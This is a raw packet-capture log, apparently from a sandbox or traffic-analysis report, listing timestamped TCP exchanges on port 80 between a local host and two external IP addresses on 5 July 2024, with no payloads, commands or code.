                                                                Jul 5, 2024 04:36:08.547986031 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.548001051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.548011065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.548012018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.548019886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.548026085 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.548043966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.548063040 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554168940 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554191113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554202080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554260015 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554276943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554290056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554299116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554310083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554357052 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554357052 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554368973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554384947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554394960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554419994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554433107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554486990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554498911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554508924 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554519892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554529905 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554531097 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554548979 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554578066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554615021 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554626942 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554641008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554652929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554663897 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554665089 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554672956 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554677963 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554702997 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554709911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554721117 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554725885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554752111 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554754972 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554764986 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554775000 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554789066 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554794073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554819107 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554845095 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554876089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554887056 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554897070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554908037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554918051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554918051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.554930925 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.554964066 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555072069 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555083036 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555099010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555110931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555115938 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555121899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555135012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555144072 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555146933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555159092 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555166960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555170059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555182934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555192947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555212975 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555237055 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555321932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555332899 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555344105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555356026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555360079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555367947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555375099 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555382967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555394888 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555394888 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555407047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555418968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555423021 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555433035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555448055 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555460930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555461884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555474043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555485010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555485964 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555496931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555499077 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555509090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:08.555521011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:08.555548906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:09.249681950 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:09.249718904 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:09.254650116 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:09.254663944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:09.827554941 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:09.827653885 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:09.886740923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:09.892529964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.077085972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.077174902 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.077210903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.077222109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.077246904 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.077264071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.079495907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.084563017 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.261887074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.261986017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.280566931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.286091089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.863272905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:10.863344908 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.888073921 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:10.894015074 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:11.452411890 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:11.452510118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:11.455375910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:11.460251093 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:11.460366011 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:11.460475922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:11.465321064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.165999889 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166016102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166028023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166042089 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166050911 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166063070 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166071892 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166085005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166081905 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.166098118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166110992 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.166162968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.166162968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.166162968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.166162968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.171050072 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.171061993 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.171072006 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.171083927 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.171119928 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.171154022 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.171283007 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.171329975 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.259605885 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.259773016 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291044950 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291069031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291079044 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291090965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291147947 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291196108 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291296959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291306973 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291316032 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291348934 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291383028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291635990 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291656971 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291668892 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291690111 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291714907 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291718006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291718006 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291726112 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291738033 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.291757107 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.291774988 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.292435884 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292450905 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292469025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292531967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.292531967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.292562008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292577982 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292587996 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.292610884 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.292642117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.293345928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293356895 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293368101 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293402910 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293402910 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.293416023 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293426991 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.293428898 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.293478966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.293478966 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.385411978 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.385495901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.385546923 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.385592937 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.416117907 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416188002 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416187048 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.416198969 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416235924 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.416270971 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.416284084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416294098 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416304111 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416315079 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416325092 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416337013 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.416373968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.416373968 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.417184114 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417195082 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417206049 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417237997 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.417251110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417260885 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.417263031 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417279959 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417290926 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.417299032 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.417319059 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.417345047 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418006897 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418060064 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418066025 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418077946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418107986 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418128014 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418129921 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418138981 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418152094 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418162107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.418174028 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418211937 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418212891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.418977976 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419023991 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419034958 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419039011 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.419070005 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.419090033 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.419096947 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419109106 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419117928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419131994 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.419141054 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.419162989 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.419192076 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420037985 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420048952 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420058012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420090914 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420093060 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420104027 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420114040 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420142889 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420172930 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420183897 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.420214891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420241117 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.420979977 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421000004 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421009064 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421031952 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421049118 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421053886 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421061039 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421091080 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421109915 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421114922 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421122074 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421152115 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421185017 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.421957016 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.421988964 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.422010899 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.422043085 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.505975008 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.505995035 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.506009102 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.506072044 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.506117105 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542505980 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542525053 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542537928 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542551041 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542565107 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542563915 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542582989 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542596102 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542615891 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542623043 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542637110 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542640924 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542651892 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542670965 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542684078 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542686939 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542686939 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542697906 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542714119 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542728901 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542850018 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542864084 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542876005 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542891979 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542902946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542916059 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542923927 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542929888 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542948961 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542972088 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.542978048 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.542994022 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.543023109 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.543034077 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.543045044 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.543046951 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.543061972 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.543073893 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.543088913 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.543111086 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.543134928 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.543948889 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544014931 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.544060946 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544075012 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544086933 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544111967 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.544135094 CEST4973180192.168.2.477.91.77.81
                                                                Jul 5, 2024 04:36:12.544148922 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544161081 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544182062 CEST804973177.91.77.81192.168.2.4
                                                                Jul 5, 2024 04:36:12.544192076 CEST4973180192.168.2.477.91.77.81
